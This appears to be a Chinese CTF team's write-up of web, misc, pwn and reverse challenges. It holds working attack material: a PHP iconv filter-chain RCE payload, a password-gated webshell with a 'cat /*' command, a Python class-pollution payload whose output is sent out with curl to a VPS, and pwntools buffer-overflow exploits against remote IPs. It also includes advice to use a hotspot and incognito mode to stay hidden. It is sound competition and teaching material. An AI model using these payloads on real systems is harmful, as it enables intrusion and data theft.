排名
Hook战队:第7名
解题思路
WEB:
easyrce
:::info
考点:文件包含
:::
源码:
<?php
error_reporting(0);
highlight_file(__FILE__);
if (!empty($_GET['PK'])){
$PK = $_GET['PK'];
if(blacklistFilter($_SERVER["QUERY_STRING"])){
include $PK;
}else{
highlight_file(__FILE__);
}
}
function blacklistFilter($arg) {
$blacklist = array('[', ']', ';', '?', '@', '(', ')', 'exec', 'eval', '$', 'phpinfo', 'flag', 'data', 'filter', '#');
$filteredInput = str_replace($blacklist, '', $arg);
return $filteredInput;
}
include $PK,可见是考文件包含
两种解法:
1、通过file协议读取flag
http://f87cb6bb.clsadp.com/?PK=file:///flag
2、 iconv filter构造 RCE。
记得切换自己手机热点,浏览器开无痕。
payload:
:::info
http://f87cb6bb.clsadp.com/?PK=php://%66%69%6c%74%65%72/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd&0=cat /*
:::
参考链接
mua
:::info
考点:robots.txt substr截取
:::
<?php
ignore_user_abort(true);
set_time_limit(0);
$file = 'shell.php';
$code = '<?php if(md5($_GET["pass"])==="c9b30e9fad74c62c2d0e4bb820964913"){ if(strlen($_GET[\'cmd\'])<9){ @system($_GET[\'cmd\']); } } ?>';
while (1){
file_put_contents($file,$code);
usleep(5000);
?>
需传递pass,cmd,但是碰撞不出c9b30e9fad74c62c2d0e4bb820964913,从其他方面入手
发现/robots.txt
访问http://ef1e9a02.clsadp.com/substr_pass.php,空白,f12,发现提示
给substr_pass.php传递a,b值,发现可以传递数字参数。
依次传递ab,发现有东西,联想到substr这个函数,估计是截取的某字符串。
经过测试,a最大是84,b是3,联想到前面的pass,预测这里就是shell.php的密码了。
payload:
:::info
http://ef1e9a02.clsadp.com//shell.php?pass=password%E6%98%AF%E5%AF%8C%E5%BC%BA%E6%B0%91%E4%B8%BB%E6%96%87%E6%98%8E%E5%92%8C%E8%B0%90%E8%87%AA%E7%94%B1%E5%B9%B3%E7%AD%89%E5%85%AC%E6%AD%A3%E6%B3%95%E5%88%B6%E7%88%B1%E5%9B%BD%E6%95%AC%E4%B8%9A%E8%AF%9A%E4%BF%A1%E5%8F%8B%E5%96%84&cmd=cat%20/*
:::
PPP
:::info
考点:Python原型链污染
:::
首页:
根据题目附件下载,得到源码:
from flask import Flask,request
import json
app = Flask(__name__)
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
def evilFunc(arg_1 , * , shell = False):
if not shell:
print(arg_1)
else:
print(__import__("os").popen(arg_1).read())
class Family:
def __init__(self):
pass
family = Family()
@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), family)
evilFunc("whoami")
return "fun"
@app.route('/eval',methods=['GET'])
def eval():
if request.args.get('cmd'):
cmd = request.args.get('cmd')
evilFunc(cmd)
return "ok"
app.run(host="0.0.0.0",port= 3000,debug=False)
这题是 python 的原型链污染,和这篇文章一模一样 https://tttang.com/archive/1876/#toc_object
采用 poc
{"init" : {"globals" :{"evilFunc" : {"kwdefaults" : {"shell" : 1}}}}}
用 vps 外带结果
/eval?cmd=curl%20http://vps:port
base64 解码获得 flag
flag{2514ba1af3b602ab0f46599e40eefdc5}
Misc
云缨
打开附件发现很多重复01248,网上搜索发现是云隐密码
编写脚本得出flag
Flag{YUNYINGISEASY}
hack_dns
下载得到压缩包,爆破得到密码258369,得到流量包和图片
Wireshark打开,题目提示dns,过滤dns,发现test.com前面有字符,打印出hex值转字符,,发现维吉尼亚密码,求密钥
图片名key,进winhex里,最后有字符串,base64解密得一半的key2,右击属性查看,发现一串韩文,韩语密码解密另一半的key2
维吉尼亚解密得flag{6fc0e1z6q897033qc0y1tv40915o659}
Pwn
stack
file查看是64位的,gdb看保护机制只开了NX
拖入ida看,存在栈溢出
且发现了有shell函数,通过溢出直接拿权限
Exp:
#coding=utf-8
from pwn import *
from LibcSearcher import *
from pwnlib import *
import base64
#context.arch="amd64"
sh=remote("60.204.130.55",10005)
elf=ELF("./stack")
libc=ELF("libc.so.6")
un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]
inter=lambda :sh.interactive()
ret=0x40082C
shell=0x40082D
un("name?\n")
sd("Hook")
un("you?\n")
sl("a"*0x98+p64(ret)+p64(shell))
inter()
alloca
64位,开了地址随机
进入welcome函数发现可以泄漏地址,用gdb调试发现存在<init+68>地址,泄漏出它就知道程序基地址了
进入vuln,因为read的第三个参数是无符号数,通过分析发现nbytes[0]输入-8-(-23)让v0=0 ,就可以实现溢出泄露libc基址
获取system函数和bin/sh
再返回main,此时有system和bin/sh
按同样的方法就拿到shell
EXP:
#coding=utf-8
from pwn import *
from LibcSearcher import *
from pwnlib import *
import base64
#context.arch="amd64"
sh=remote("121.196.192.181",10007)
#sh=process("./sleep")
elf=ELF("./pwn4")
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc=ELF("libc.so.6")
un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]
inter=lambda :sh.interactive()
un("name? ")
sd("a"*8)
un("Hello! aaaaaaaa")
cxjz=u64(sh.recv(6)+"\x00"*2)-0x122D
pop_rdi=0x1463+cxjz
ret=cxjz+0x1464
puts_got=elf.got['puts']+cxjz
puts=elf.plt['puts']+cxjz
start=cxjz+0x12A7
un("long? ")
sl("-23")
un("say? ")
sd("a"*0x18+p64(pop_rdi)+p64(puts_got)+p64(puts)+p64(start))
jz=Jz("puts")
system=jz+libc.sym['system']
bin_sh=jz+libc.search("/bin/sh").next()
un("long? ")
sl("-23")
un("say? ")
sd("a"*0x18+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system))
inter()
Reverse
ezpython
下载得到main.exe,通过pyinstxtractor解包,得到main.pyc
通过在线pyc反编译https://tool.lu/pyc/,得到信息。
编写异或解密脚本:
str = 'cidb~071c75g62=a=d2=acc211c010`1<`gacx'
flag=""
for i in range(len(str)):
flag+= chr(ord(str[i]) ^ 5)
print(flag)
ezpe
32位 没有加壳 ida进入分析
通过string发现存在 Brainfuck加密的
直接放进010分析,key1已知,但有坑,有两个key2,pe文件尾部为真,最后拼接获得flag
flag is flag{key1_key2},but where is the key???Do not frustrated!I can give you key1,key1:w0w! Now go find key2
假:key2:PE_sT3uctU3e_1$ 真:key2:PE_sT3uctU3e_1$_suBt1e
flag{w0w!_PE_sT3uctU3e_1$_suBt1e}